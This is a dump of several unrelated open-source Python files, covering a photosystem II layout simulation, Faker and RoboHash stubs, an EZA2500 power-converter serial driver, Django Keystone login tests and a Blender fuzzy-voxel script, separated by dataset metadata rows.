    #         pd.read_csv(file).values.tolist()
    #         for file in obj_dict["shapes_simple"]
    #     ]
    def __generate_object_list(
        self,
        spawn_seed=0,
    ) -> Iterator[Any]:
        """
        Generates a list of dicts, each containing the data needed to create a
        PSII structure, in this format:
        {
            "obj_type": str, # ex. "C2S2M2"
            "pos_xy": list, # [x, y] coordinates
            "angle": float, # angle in radians
            "sprite": ImageData object, a sprite for the object type
            "color": (0, 0, 0, 255) RGBA color tuple
            "shapes_simple": simple shape coordinate list
            "shapes_compound": list of shape coordinate pairs, one for each of the
                various compound shapes that are needed to create the PSII structure
        }
        The list is returned as an iterator, so the next() function yields the
        next item.
        """
        obj_list = []
        structure_types = ["C2S2M2", "C2S2M", "C2S2", "C2", "C1", "CP43"]
        structure_p = [0.57, 0.17, 0.12, 0.09, 0.03, 0.02]

        # spawn_seed == 0 means "unseeded": a fresh, non-reproducible generator
        if spawn_seed == 0:
            rng = np.random.default_rng()
        else:
            rng = np.random.default_rng(spawn_seed)

        obj_types = rng.choice(
            structure_types, len(self.pos_list), replace=True, p=structure_p
        )
        random_pos_list = random.sample(self.pos_list, len(self.pos_list))
        print(len(random_pos_list))
        for pos, obj_type in zip(random_pos_list, obj_types):
            obj_entry = {
                "obj_type": obj_type,
                "pos": pos,
                "angle": (2 * pi * random.random()),
                "sprite": self.type_dict[obj_type]["sprite"],
                "color": self.type_dict[obj_type]["color"],
                "shapes_simple": self.type_dict[obj_type]["shapes_simple"],
                "shapes_compound": self.type_dict[obj_type]["shapes_compound"],
            }
            obj_list.append(obj_entry)
        return iter(obj_list)


class ObjectDataExistingData(ObjectData):
    """Loads object data from a CSV that already records type, position, and angle."""

    def __init__(self, pos_csv_filename: str, spawn_seed=0):
        self.__object_colors_dict = {
            "LHCII": (0, 51, 0, 255),  # darkest green
            "LHCII_monomer": (0, 75, 0, 255),  # darkest green
            "C2S2M2": (0, 102, 0, 255),
            "C2S2M": (0, 153, 0, 255),
            "C2S2": (102, 204, 0, 255),
            "C2": (128, 255, 0, 255),
            "C1": (178, 255, 102, 255),  # lightest green
            "CP43": (178, 255, 103, 255),  # same coordinates as C1, same color
            "cytb6f": (51, 153, 255, 255),  # light blue
        }
        self.res_path = "src/grana_model/res/"
        self.type_dict = {
            obj_type: self.__generate_object_dict(obj_type)
            for obj_type in self.__object_colors_dict.keys()
        }
        self.pos_list = self.__import_pos_data(
            f"{self.res_path}/grana_coordinates/{pos_csv_filename}"
        )
        self.object_list = self.__generate_object_list(
            spawn_seed=spawn_seed,
        )

    def __generate_object_dict(self, obj_type: str):
        obj_dict = {
            "obj_type": obj_type,
            "shapes_compound": self.__load_compound_shapes(obj_type),
            "shapes_simple": self.__load_simple_shapes(obj_type),
            # "sprite": image.load(f"{self.res_path}/sprites/{obj_type}.png"),
            "sprite": os.path.join(self.res_path, f"sprites/{obj_type}.png"),
            "color": self.__object_colors_dict[obj_type],
        }
        return obj_dict

    def __import_pos_data(self, file_path):
        """Imports the (type, x, y, angle) rows from the csv data file provided in file_path"""
        imported_csv = pd.read_csv(file_path)
        return pd.DataFrame(
            imported_csv, columns=["type", "x", "y", "angle"]
        ).values.tolist()

    def __load_simple_shapes(self, obj_type):
        with open(f"{self.res_path}shapes/{obj_type}_simple.pickle", "rb") as f:
            return pickle.load(f)

    def __load_compound_shapes(self, obj_type):
        with open(f"{self.res_path}shapes/{obj_type}.pickle", "rb") as f:
            return pickle.load(f)

    def __generate_object_list(
        self,
        spawn_seed=0,
    ) -> Iterator[Any]:
        """
        Generates a list of dicts, each containing the data needed to create a
        PSII structure, in this format:
        {
            "obj_type": str, # ex. "C2S2M2"
            "pos_xy": list, # [x, y] coordinates
            "angle": float, # angle in radians
            "sprite": ImageData object, a sprite for the object type
            "color": (0, 0, 0, 255) RGBA color tuple
            "shapes_simple": simple shape coordinate list
            "shapes_compound": list of shape coordinate pairs, one for each of the
                various compound shapes that are needed to create the PSII structure
        }
        The list is returned as an iterator, so the next() function yields the
        next item.
        """
        obj_list = [
            {
                "obj_type": obj_type,
                "pos": (x, y),
                "angle": angle,
                "sprite": self.type_dict[obj_type]["sprite"],
                "color": self.type_dict[obj_type]["color"],
                "shapes_simple": self.type_dict[obj_type]["shapes_simple"],
                "shapes_compound": self.type_dict[obj_type]["shapes_compound"],
            }
            for obj_type, x, y, angle in self.pos_list
        ]
        return iter(obj_list)


if __name__ == "__main__":
    pass
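`__generate_object_list` draws a structure type for every spawn position with `numpy`'s `Generator.choice`, weighted by `structure_p`, and a nonzero `spawn_seed` makes the draw reproducible. A small self-contained sketch of that sampling step, using the same types and weights as above (the sample size of 10 stands in for the real position list):

```python
import numpy as np

structure_types = ["C2S2M2", "C2S2M", "C2S2", "C2", "C1", "CP43"]
structure_p = [0.57, 0.17, 0.12, 0.09, 0.03, 0.02]
assert abs(sum(structure_p) - 1.0) < 1e-9  # choice() requires weights summing to 1

rng = np.random.default_rng(42)  # fixed seed -> reproducible layout
obj_types = rng.choice(structure_types, 10, replace=True, p=structure_p)
print(list(obj_types))  # ten types, mostly "C2S2M2" given its 0.57 weight
```

Re-seeding with the same value reproduces the exact same sequence, which is what makes `spawn_seed` useful for repeatable simulations.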


# faker/providers/user_agent/en_US/__iniut__.py (bdclauser/Faker, MIT license)
from .. import Provider as UserAgentProvider


class Provider(UserAgentProvider):
    pass


# RoboHashpy/__init__.py (namanko/RoboHash, MIT license)
from .RoboHashpy import RoboHash


# drivers/eza2500/command0301.py (jinupygogo/apis-dcdc_batt_comm, Apache-2.0 license)
# -*- coding: utf-8 -*-
from struct import pack, unpack
import os
from essx import essx_debug
from essx.essx_exception import ESSXDeviceException, ESSXValueException, ESSXParameterException, ESSXException
from eza2500 import eza2500_base
from eza2500 import eza2500_util
class Command0301(eza2500_base.EZA2500CommandBase):
""" EZA2500 3-1 """
COMMAND = 24
CMD_LEN = 0
ACK_LEN = 4
NAK_LEN = 2
def __init__(self, device):
super(Command0301, self).__init__(device)
self.response = {}
def pack_senddata(self, ad1, ad2, params = {}):
req = pack("<BBBBB", 0x05 ,self.CMD_LEN ,ad1 ,ad2 ,24) + b"00"
return eza2500_util.replace_check_sum(req)
def send(self, ad1, ad2, params = {}):
send_data = self.pack_senddata(ad1, ad2, params)
essx_debug.log('send')
essx_debug.dump(send_data)
self.device.write(send_data)
return send_data
def recv(self):
essx_debug.log('recv')
recv_data = self._recv()
self.response_raw = recv_data
res = {}
(_sfd, _len, _ad1, _ad2, _cmd) = unpack("BBBBB", recv_data[0:5])
if _cmd == 0x18: #ACK
(_cvb ,_drb ,_chksum) = unpack("<HHH", recv_data[5:])
_cvb = eza2500_util.q_denormalize(_cvb, 14, '48', '32', '62', 'cvb')
_drb = eza2500_util.q_denormalize(_drb, 13, '1', '0', '3.999', 'drb')
res["cvb"] = _cvb
res["drb"] = _drb
res["chksum"] = _chksum
self.response = res
elif _cmd == 0x98: #NAK
(_ercd ,_chksum) = unpack("<HH", recv_data[5:])
res["ercd"] = _ercd
res["chksum"] = _chksum
self.response = res
raise ESSXDeviceException("error: ERCD=%x" % _ercd)
else:
raise ESSXValueException("bad response")
self.response = res
essx_debug.log('recv')
#essx_debug.dump(recv_data)
return recv_data
@classmethod
def unit_test(cls, dev = None, params = None):
from io import BytesIO
class Dummy:
def __init__(self):
_cvb = 47.0
_cvb = int(eza2500_util.q_normalize(_cvb, 14, '48', '32', '62', 'cvb'))
_drb = 1.9995
_drb = int(eza2500_util.q_normalize(_drb, 13, '1', '0', '3.999', 'drb'))
_chksum = 0
data = pack("<BBBBBHHH", 2, Command0301.ACK_LEN, 1, 2, 0x18, _cvb ,_drb ,_chksum)
_chksum = eza2500_util.calc_check_sum(data)
self.reader = BytesIO(data[:-2] + pack('BB', _chksum % 256, _chksum // 256))
def read(self, bytes):
return self.reader.read(bytes)
def write(self, data):
essx_debug.dump(data)
        if dev is None:
            dev = Dummy()
        cmd = Command0301(dev)
        if params is None:
            params = {}
cmd.send(1, 2, params)
cmd.recv()
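Command0301 round-trips values through `eza2500_util.q_normalize` / `q_denormalize`, i.e. fixed-point Q-format encoding (e.g. `cvb` as Q14 against a 48 V base). The helpers below are an illustrative sketch of plain Qn scaling, `raw = round(value * 2**n / base)`; the real EZA2500 range-clamping rules are not reproduced here:

```python
# Illustrative Q-format fixed-point conversion (assumption: plain Qn
# scaling against a base value; not the exact eza2500_util semantics).

def q_encode(value, n, base):
    """Encode a float as a Qn integer relative to `base`."""
    return int(round(value * (1 << n) / base))

def q_decode(raw, n, base):
    """Decode a Qn integer back to a float."""
    return raw * base / (1 << n)

raw = q_encode(47.0, 14, 48.0)      # e.g. battery voltage, Q14, 48 V base
roundtrip = q_decode(raw, 14, 48.0)  # within one quantisation step of 47.0
```

The quantisation error of such an encoding is bounded by half a step, `base / 2**(n+1)`, which is why Q14 is ample for a voltage reported to two decimals.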
class Command0304(eza2500_base.EZA2500CommandBase):
""" EZA2500 3-4 """
COMMAND = 24
CMD_LEN = 4
ACK_LEN = 4
NAK_LEN = 2
def __init__(self, device):
super(Command0304, self).__init__(device)
self.response = {}
def pack_senddata(self, ad1, ad2, params = {}):
if 'cvb' in params:
_cvb = params['cvb']
else:
raise ESSXParameterException('no parameter: cvb')
if 'drb' in params:
_drb = params['drb']
else:
raise ESSXParameterException('no parameter: drb')
_cvb = int(eza2500_util.q_normalize(_cvb, 14, '48', '32', '62', 'cvb'))
_drb = int(eza2500_util.q_normalize(_drb, 13, '1', '0', '3.999', 'drb'))
req = pack("<BBBBBHH", 0x05 ,self.CMD_LEN ,ad1 ,ad2 ,24 ,_cvb ,_drb) + b"00"
return eza2500_util.replace_check_sum(req)
def send(self, ad1, ad2, params = {}):
send_data = self.pack_senddata(ad1, ad2, params)
essx_debug.log('send')
essx_debug.dump(send_data)
self.device.write(send_data)
return send_data
def recv(self):
essx_debug.log('recv')
recv_data = self._recv()
self.response_raw = recv_data
res = {}
(_sfd, _len, _ad1, _ad2, _cmd) = unpack("BBBBB", recv_data[0:5])
if _cmd == 0x18: #ACK
(_cvb ,_drb ,_chksum) = unpack("<HHH", recv_data[5:])
_cvb = eza2500_util.q_denormalize(_cvb, 14, '48', '32', '62', 'cvb')
_drb = eza2500_util.q_denormalize(_drb, 13, '1', '0', '3.999', 'drb')
res["cvb"] = _cvb
res["drb"] = _drb
res["chksum"] = _chksum
self.response = res
elif _cmd == 0x98: #NAK
(_ercd ,_chksum) = unpack("<HH", recv_data[5:])
res["ercd"] = _ercd
res["chksum"] = _chksum
self.response = res
raise ESSXDeviceException("error: ERCD=%x" % _ercd)
else:
raise ESSXValueException("bad response")
self.response = res
essx_debug.log('recv')
#essx_debug.dump(recv_data)
return recv_data
@classmethod
def unit_test(cls, dev = None, params = None):
from io import BytesIO
class Dummy:
def __init__(self):
_cvb = 47.0
_cvb = int(eza2500_util.q_normalize(_cvb, 14, '48', '32', '62', 'cvb'))
_drb = 1.9995
_drb = int(eza2500_util.q_normalize(_drb, 13, '1', '0', '3.999', 'drb'))
_chksum = 0
data = pack("<BBBBBHHH", 2, Command0304.ACK_LEN, 1, 2, 0x18, _cvb ,_drb ,_chksum)
_chksum = eza2500_util.calc_check_sum(data)
self.reader = BytesIO(data[:-2] + pack('BB', _chksum % 256, _chksum // 256))
def read(self, bytes):
return self.reader.read(bytes)
def write(self, data):
essx_debug.dump(data)
        if dev is None:
            dev = Dummy()
        cmd = Command0304(dev)
        if params is None:
            params = {}
_cvb = 47.0
params['cvb'] = _cvb
_drb = 1.9995
params['drb'] = _drb
cmd.send(1, 2, params)
cmd.recv()
# To run the unit tests standalone, add the parent directory to PYTHONPATH.
if __name__ == "__main__":
import sys
#import serial
import essx
from eza2500_device import EZA2500Device
if len(sys.argv) > 1 and sys.argv[1] == '1':
ser_dev = essx.essx_rs232c.ESSXRS232C('/dev/cuaU1', 115200)
dev = EZA2500Device(dev = ser_dev, timeout = 1)
else:
dev = None
try:
Command0301.unit_test(dev)
except ESSXException as err:
print(err.reason)
raise err
try:
Command0304.unit_test(dev)
except ESSXException as err:
print(err.reason)
raise err
| 29.712195 | 110 | 0.616648 | 823 | 6,091 | 4.306197 | 0.157959 | 0.046558 | 0.03386 | 0.025395 | 0.792325 | 0.735892 | 0.735892 | 0.711061 | 0.711061 | 0.711061 | 0 | 0.079673 | 0.237564 | 6,091 | 204 | 111 | 29.857843 | 0.683463 | 0.026761 | 0 | 0.789474 | 0 | 0 | 0.059252 | 0 | 0 | 0 | 0.005417 | 0 | 0 | 1 | 0.093567 | false | 0 | 0.064327 | 0.011696 | 0.274854 | 0.011696 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
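The eza2500 driver above builds frames with a 5-byte header (SFD, length, ad1, ad2, command), a little-endian payload, and a trailing 16-bit checksum patched in by `replace_check_sum`. A self-contained sketch of that frame shape follows; the checksum rule used here (byte sum mod 65536) is an assumption, not the documented EZA2500 algorithm:

```python
from struct import pack, unpack

# Minimal EZA2500-style frame: header + payload + 16-bit checksum.
# Checksum = sum of all preceding bytes mod 65536 (an assumption).

def build_frame(cmd, ad1, ad2, payload=b""):
    body = pack("<BBBBB", 0x05, len(payload), ad1, ad2, cmd) + payload
    return body + pack("<H", sum(body) % 65536)

def parse_frame(frame):
    sfd, length, ad1, ad2, cmd = unpack("<BBBBB", frame[:5])
    payload = frame[5:-2]
    (chksum,) = unpack("<H", frame[-2:])
    if chksum != sum(frame[:-2]) % 65536:
        raise ValueError("bad checksum")
    return cmd, ad1, ad2, payload

frame = build_frame(0x18, 1, 2, pack("<HH", 16043, 16380))
cmd, ad1, ad2, payload = parse_frame(frame)
```

Sending the checksum placeholder as the literal bytes `b"00"` and overwriting it afterwards, as the driver does, keeps `pack` format strings simple at the cost of one extra pass over the buffer.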
c05c37dc984dcc04d7f07c7ece3abf0472f5d6d9 | 7,470 | py | Python | dhc_os_auth/tests/tests.py | dreamhost/dreamhost_openstack_auth | 9134a2ce9bf807ee6b6b0cedc340ff5de3ffc40a | [
"BSD-3-Clause"
] | null | null | null | dhc_os_auth/tests/tests.py | dreamhost/dreamhost_openstack_auth | 9134a2ce9bf807ee6b6b0cedc340ff5de3ffc40a | [
"BSD-3-Clause"
] | null | null | null | dhc_os_auth/tests/tests.py | dreamhost/dreamhost_openstack_auth | 9134a2ce9bf807ee6b6b0cedc340ff5de3ffc40a | [
"BSD-3-Clause"
] | null | null | null | from django import test
from django.conf import settings
from django.core.urlresolvers import reverse
from keystoneclient import exceptions as keystone_exceptions
from keystoneclient.v2_0 import client
import mox
from .data import generate_test_data
class OpenStackAuthTests(test.TestCase):
def setUp(self):
super(OpenStackAuthTests, self).setUp()
self.mox = mox.Mox()
self.data = generate_test_data()
endpoint = settings.OPENSTACK_KEYSTONE_URL
self.keystone_client = client.Client(endpoint=endpoint)
self.keystone_client.service_catalog = self.data.service_catalog
def tearDown(self):
self.mox.UnsetStubs()
self.mox.VerifyAll()
def test_login(self):
tenants = [self.data.tenant_one, self.data.tenant_two]
user = self.data.user
sc = self.data.service_catalog
form_data = {'region': settings.OPENSTACK_KEYSTONE_URL,
'password': user.password,
'username': user.name}
self.mox.StubOutWithMock(client, "Client")
self.mox.StubOutWithMock(self.keystone_client.tenants, "list")
self.mox.StubOutWithMock(self.keystone_client.tokens, "authenticate")
client.Client(auth_url=settings.OPENSTACK_KEYSTONE_URL,
password=user.password,
username=user.name,
tenant_id=None).AndReturn(self.keystone_client)
self.keystone_client.tenants.list().AndReturn(tenants)
self.keystone_client.tokens.authenticate(tenant_id=tenants[1].id,
token=sc.get_token()['id'],
username=user.name) \
.AndReturn(self.data.scoped_token)
self.mox.ReplayAll()
url = reverse('login')
# GET the page to set the test cookie.
response = self.client.get(url, form_data)
self.assertEqual(response.status_code, 200)
# POST to the page to log in.
response = self.client.post(url, form_data)
self.assertRedirects(response, settings.LOGIN_REDIRECT_URL)
def test_no_tenants(self):
user = self.data.user
form_data = {'region': settings.OPENSTACK_KEYSTONE_URL,
'password': user.password,
'username': user.name}
self.mox.StubOutWithMock(client, "Client")
self.mox.StubOutWithMock(self.keystone_client.tenants, "list")
client.Client(auth_url=settings.OPENSTACK_KEYSTONE_URL,
password=user.password,
username=user.name,
tenant_id=None).AndReturn(self.keystone_client)
self.keystone_client.tenants.list().AndReturn([])
self.mox.ReplayAll()
url = reverse('login')
# GET the page to set the test cookie.
response = self.client.get(url, form_data)
self.assertEqual(response.status_code, 200)
# POST to the page to log in.
response = self.client.post(url, form_data)
self.assertTemplateUsed(response, 'auth/login.html')
self.assertContains(response,
'You are not authorized for any projects.')
def test_invalid_credentials(self):
user = self.data.user
form_data = {'region': settings.OPENSTACK_KEYSTONE_URL,
'password': "invalid",
'username': user.name}
self.mox.StubOutWithMock(client, "Client")
exc = keystone_exceptions.Unauthorized(401)
client.Client(auth_url=settings.OPENSTACK_KEYSTONE_URL,
password="invalid",
username=user.name,
tenant_id=None).AndRaise(exc)
self.mox.ReplayAll()
url = reverse('login')
# GET the page to set the test cookie.
response = self.client.get(url, form_data)
self.assertEqual(response.status_code, 200)
# POST to the page to log in.
response = self.client.post(url, form_data)
self.assertTemplateUsed(response, 'auth/login.html')
self.assertContains(response, "Invalid user name or password.")
def test_exception(self):
user = self.data.user
form_data = {'region': settings.OPENSTACK_KEYSTONE_URL,
'password': user.password,
'username': user.name}
self.mox.StubOutWithMock(client, "Client")
exc = keystone_exceptions.ClientException(500)
client.Client(auth_url=settings.OPENSTACK_KEYSTONE_URL,
password=user.password,
username=user.name,
tenant_id=None).AndRaise(exc)
self.mox.ReplayAll()
url = reverse('login')
# GET the page to set the test cookie.
response = self.client.get(url, form_data)
self.assertEqual(response.status_code, 200)
# POST to the page to log in.
response = self.client.post(url, form_data)
self.assertTemplateUsed(response, 'auth/login.html')
self.assertContains(response,
("An error occurred authenticating. Please try "
"again later."))
def test_switch(self):
tenant = self.data.tenant_two
tenants = [self.data.tenant_one, self.data.tenant_two]
user = self.data.user
scoped = self.data.scoped_token
sc = self.data.service_catalog
form_data = {'region': settings.OPENSTACK_KEYSTONE_URL,
'username': user.name,
'password': user.password}
self.mox.StubOutWithMock(client, "Client")
self.mox.StubOutWithMock(self.keystone_client.tenants, "list")
self.mox.StubOutWithMock(self.keystone_client.tokens, "authenticate")
client.Client(auth_url=settings.OPENSTACK_KEYSTONE_URL,
password=user.password,
username=user.name,
tenant_id=None).AndReturn(self.keystone_client)
self.keystone_client.tenants.list().AndReturn(tenants)
self.keystone_client.tokens.authenticate(tenant_id=tenants[1].id,
token=sc.get_token()['id'],
username=user.name) \
.AndReturn(scoped)
client.Client(endpoint=settings.OPENSTACK_KEYSTONE_URL) \
.AndReturn(self.keystone_client)
self.keystone_client.tokens.authenticate(tenant_id=tenant.id,
token=sc.get_token()['id']) \
.AndReturn(scoped)
self.mox.ReplayAll()
url = reverse('login')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
response = self.client.post(url, form_data)
self.assertRedirects(response, settings.LOGIN_REDIRECT_URL)
url = reverse('switch_tenants', args=[tenant.id])
scoped.tenant['id'] = self.data.tenant_two._info
sc.catalog['token']['id'] = self.data.tenant_two.id
form_data['tenant_id'] = tenant.id
response = self.client.get(url, form_data)
self.assertRedirects(response, settings.LOGIN_REDIRECT_URL)
self.assertEqual(self.client.session['tenant_id'],
scoped.tenant['id'])
| 36.79803 | 78 | 0.601071 | 798 | 7,470 | 5.481203 | 0.134085 | 0.028807 | 0.069959 | 0.076818 | 0.782579 | 0.742341 | 0.722679 | 0.706447 | 0.701646 | 0.685871 | 0 | 0.004776 | 0.299331 | 7,470 | 202 | 79 | 36.980198 | 0.830913 | 0.034672 | 0 | 0.659574 | 0 | 0 | 0.060539 | 0 | 0 | 0 | 0 | 0 | 0.106383 | 1 | 0.049645 | false | 0.078014 | 0.049645 | 0 | 0.106383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
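The test suite above uses the legacy `mox` record/replay library (`StubOutWithMock`, `ReplayAll`, `VerifyAll`). The same stub-and-verify flow in the standard library's `unittest.mock` looks like this; the `Client` class here is illustrative, not the keystoneclient API:

```python
from unittest import mock

# Illustrative stand-in for a network-backed client (not keystoneclient).
class Client:
    def authenticate(self, username, password):
        raise NotImplementedError("talks to the network")

# Stub the method for the duration of the block, then verify the call.
with mock.patch.object(Client, "authenticate",
                       return_value={"token": "abc"}) as m:
    token = Client().authenticate(username="u", password="p")
```

Where mox requires every expected call to be recorded up front and replayed in order, `unittest.mock` records calls as they happen and lets the test assert on them afterwards, which tends to make refactors less brittle.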
227bd906c6afba5a3135961cdc318f0957d0dc4d | 23,913 | py | Python | examples/vm.py | oreuta/fuzzy-voxels | c3d684a7299cd8b9316a015353f71cce8e6ef1da | [
"MIT"
] | null | null | null | examples/vm.py | oreuta/fuzzy-voxels | c3d684a7299cd8b9316a015353f71cce8e6ef1da | [
"MIT"
] | null | null | null | examples/vm.py | oreuta/fuzzy-voxels | c3d684a7299cd8b9316a015353f71cce8e6ef1da | [
"MIT"
] | null | null | null | import numpy as np
import bpy
def draw_voxel_model(V, N, M, K, group_name='VM'):
    """Render an N*M*K fuzzy voxel model V in Blender.

    Each voxel with membership p > 0 becomes a unit cube whose material
    alpha equals p, so fuzzier voxels render more transparent.  All cubes
    are linked into a new group named `group_name`, centred on the origin.
    """
    g = bpy.data.groups.new(group_name)
    Nh = N / 2
    Mh = M / 2
    Kh = K / 2
    for i in range(N):
        for j in range(M):
            for k in range(K):
                p = V[i, j, k]
                if p > 0:
                    # One shared material per distinct membership value,
                    # named from its decimals (e.g. 0.52 -> 'm52').
                    mat_name = 'm' + str(p)[2:]
                    mat = bpy.data.materials.get(mat_name)
                    if mat is None:
                        mat = bpy.data.materials.new(mat_name)
                        mat.diffuse_color = (0.5, 0.5, 0.5)
                        mat.alpha = p
                        mat.use_transparency = True
                    bpy.ops.mesh.primitive_cube_add(
                        location=(i + 1/2 - Nh, j + 1/2 - Mh, k + 1/2 - Kh))
                    v = bpy.context.active_object
                    v.dimensions = (1, 1, 1)
                    v.active_material = mat
                    v.show_transparent = True
                    g.objects.link(v)
    return g
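The hundreds of literal `VM[i,j,k]` assignments that follow encode a radially symmetric fuzzy solid on an 11x11x11 grid. A grid of that shape can also be built programmatically; the clamped linear falloff below is illustrative only and does not reproduce the exact membership values in this file:

```python
# Build an n*n*n fuzzy-ball grid: membership 1.0 inside `radius`,
# fading linearly to 0.0 over a shell of width `fuzz`.  The falloff
# formula is an assumption, not the generator of the data below.

def fuzzy_ball(n, radius, fuzz):
    c = (n - 1) / 2.0  # grid centre
    grid = [[[0.0] * n for _ in range(n)] for _ in range(n)]
    for i in range(n):
        for j in range(n):
            for k in range(n):
                d = ((i - c) ** 2 + (j - c) ** 2 + (k - c) ** 2) ** 0.5
                m = 1.0 - (d - radius) / fuzz
                grid[i][j][k] = round(max(0.0, min(1.0, m)), 2)
    return grid

G = fuzzy_ball(11, 3.0, 2.5)
```

Generating the grid this way (or loading it from a file) keeps the script short and makes the membership function explicit, at the cost of the exact hand-tuned values listed here.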
VM = np.zeros( (11, 11, 11), dtype=float)
VM[0,0,0] = 0.00
VM[1,0,0] = 0.00
VM[2,0,0] = 0.00
VM[3,0,0] = 0.00
VM[4,0,0] = 0.00
VM[5,0,0] = 0.00
VM[6,0,0] = 0.00
VM[7,0,0] = 0.00
VM[8,0,0] = 0.00
VM[9,0,0] = 0.00
VM[10,0,0] = 0.00
VM[0,1,0] = 0.00
VM[1,1,0] = 0.00
VM[2,1,0] = 0.00
VM[3,1,0] = 0.00
VM[4,1,0] = 0.00
VM[5,1,0] = 0.00
VM[6,1,0] = 0.00
VM[7,1,0] = 0.00
VM[8,1,0] = 0.00
VM[9,1,0] = 0.00
VM[10,1,0] = 0.00
VM[0,2,0] = 0.00
VM[1,2,0] = 0.00
VM[2,2,0] = 0.00
VM[3,2,0] = 0.00
VM[4,2,0] = 0.07
VM[5,2,0] = 0.14
VM[6,2,0] = 0.07
VM[7,2,0] = 0.00
VM[8,2,0] = 0.00
VM[9,2,0] = 0.00
VM[10,2,0] = 0.00
VM[0,3,0] = 0.00
VM[1,3,0] = 0.00
VM[2,3,0] = 0.00
VM[3,3,0] = 0.21
VM[4,3,0] = 0.52
VM[5,3,0] = 0.60
VM[6,3,0] = 0.52
VM[7,3,0] = 0.21
VM[8,3,0] = 0.00
VM[9,3,0] = 0.00
VM[10,3,0] = 0.00
VM[0,4,0] = 0.00
VM[1,4,0] = 0.00
VM[2,4,0] = 0.07
VM[3,4,0] = 0.52
VM[4,4,0] = 0.80
VM[5,4,0] = 0.90
VM[6,4,0] = 0.80
VM[7,4,0] = 0.52
VM[8,4,0] = 0.07
VM[9,4,0] = 0.00
VM[10,4,0] = 0.00
VM[0,5,0] = 0.00
VM[1,5,0] = 0.00
VM[2,5,0] = 0.14
VM[3,5,0] = 0.60
VM[4,5,0] = 0.90
VM[5,5,0] = 1.00
VM[6,5,0] = 0.90
VM[7,5,0] = 0.60
VM[8,5,0] = 0.14
VM[9,5,0] = 0.00
VM[10,5,0] = 0.00
VM[0,6,0] = 0.00
VM[1,6,0] = 0.00
VM[2,6,0] = 0.07
VM[3,6,0] = 0.52
VM[4,6,0] = 0.80
VM[5,6,0] = 0.90
VM[6,6,0] = 0.80
VM[7,6,0] = 0.52
VM[8,6,0] = 0.07
VM[9,6,0] = 0.00
VM[10,6,0] = 0.00
VM[0,7,0] = 0.00
VM[1,7,0] = 0.00
VM[2,7,0] = 0.00
VM[3,7,0] = 0.21
VM[4,7,0] = 0.52
VM[5,7,0] = 0.60
VM[6,7,0] = 0.52
VM[7,7,0] = 0.21
VM[8,7,0] = 0.00
VM[9,7,0] = 0.00
VM[10,7,0] = 0.00
VM[0,8,0] = 0.00
VM[1,8,0] = 0.00
VM[2,8,0] = 0.00
VM[3,8,0] = 0.00
VM[4,8,0] = 0.07
VM[5,8,0] = 0.14
VM[6,8,0] = 0.07
VM[7,8,0] = 0.00
VM[8,8,0] = 0.00
VM[9,8,0] = 0.00
VM[10,8,0] = 0.00
VM[0,9,0] = 0.00
VM[1,9,0] = 0.00
VM[2,9,0] = 0.00
VM[3,9,0] = 0.00
VM[4,9,0] = 0.00
VM[5,9,0] = 0.00
VM[6,9,0] = 0.00
VM[7,9,0] = 0.00
VM[8,9,0] = 0.00
VM[9,9,0] = 0.00
VM[10,9,0] = 0.00
VM[0,10,0] = 0.00
VM[1,10,0] = 0.00
VM[2,10,0] = 0.00
VM[3,10,0] = 0.00
VM[4,10,0] = 0.00
VM[5,10,0] = 0.00
VM[6,10,0] = 0.00
VM[7,10,0] = 0.00
VM[8,10,0] = 0.00
VM[9,10,0] = 0.00
VM[10,10,0] = 0.00
VM[0,0,1] = 0.00
VM[1,0,1] = 0.00
VM[2,0,1] = 0.00
VM[3,0,1] = 0.00
VM[4,0,1] = 0.00
VM[5,0,1] = 0.00
VM[6,0,1] = 0.00
VM[7,0,1] = 0.00
VM[8,0,1] = 0.00
VM[9,0,1] = 0.00
VM[10,0,1] = 0.00
VM[0,1,1] = 0.00
VM[1,1,1] = 0.00
VM[2,1,1] = 0.00
VM[3,1,1] = 0.04
VM[4,1,1] = 0.19
VM[5,1,1] = 0.24
VM[6,1,1] = 0.19
VM[7,1,1] = 0.04
VM[8,1,1] = 0.00
VM[9,1,1] = 0.00
VM[10,1,1] = 0.00
VM[0,2,1] = 0.00
VM[1,2,1] = 0.00
VM[2,2,1] = 0.14
VM[3,2,1] = 0.62
VM[4,2,1] = 0.91
VM[5,2,1] = 0.96
VM[6,2,1] = 0.91
VM[7,2,1] = 0.62
VM[8,2,1] = 0.14
VM[9,2,1] = 0.00
VM[10,2,1] = 0.00
VM[0,3,1] = 0.00
VM[1,3,1] = 0.04
VM[2,3,1] = 0.62
VM[3,3,1] = 0.99
VM[4,3,1] = 1.00
VM[5,3,1] = 1.00
VM[6,3,1] = 1.00
VM[7,3,1] = 0.99
VM[8,3,1] = 0.62
VM[9,3,1] = 0.04
VM[10,3,1] = 0.00
VM[0,4,1] = 0.00
VM[1,4,1] = 0.19
VM[2,4,1] = 0.91
VM[3,4,1] = 1.00
VM[4,4,1] = 1.00
VM[5,4,1] = 1.00
VM[6,4,1] = 1.00
VM[7,4,1] = 1.00
VM[8,4,1] = 0.91
VM[9,4,1] = 0.19
VM[10,4,1] = 0.00
VM[0,5,1] = 0.00
VM[1,5,1] = 0.24
VM[2,5,1] = 0.96
VM[3,5,1] = 1.00
VM[4,5,1] = 1.00
VM[5,5,1] = 1.00
VM[6,5,1] = 1.00
VM[7,5,1] = 1.00
VM[8,5,1] = 0.96
VM[9,5,1] = 0.24
VM[10,5,1] = 0.00
VM[0,6,1] = 0.00
VM[1,6,1] = 0.19
VM[2,6,1] = 0.91
VM[3,6,1] = 1.00
VM[4,6,1] = 1.00
VM[5,6,1] = 1.00
VM[6,6,1] = 1.00
VM[7,6,1] = 1.00
VM[8,6,1] = 0.91
VM[9,6,1] = 0.19
VM[10,6,1] = 0.00
VM[0,7,1] = 0.00
VM[1,7,1] = 0.04
VM[2,7,1] = 0.62
VM[3,7,1] = 0.99
VM[4,7,1] = 1.00
VM[5,7,1] = 1.00
VM[6,7,1] = 1.00
VM[7,7,1] = 0.99
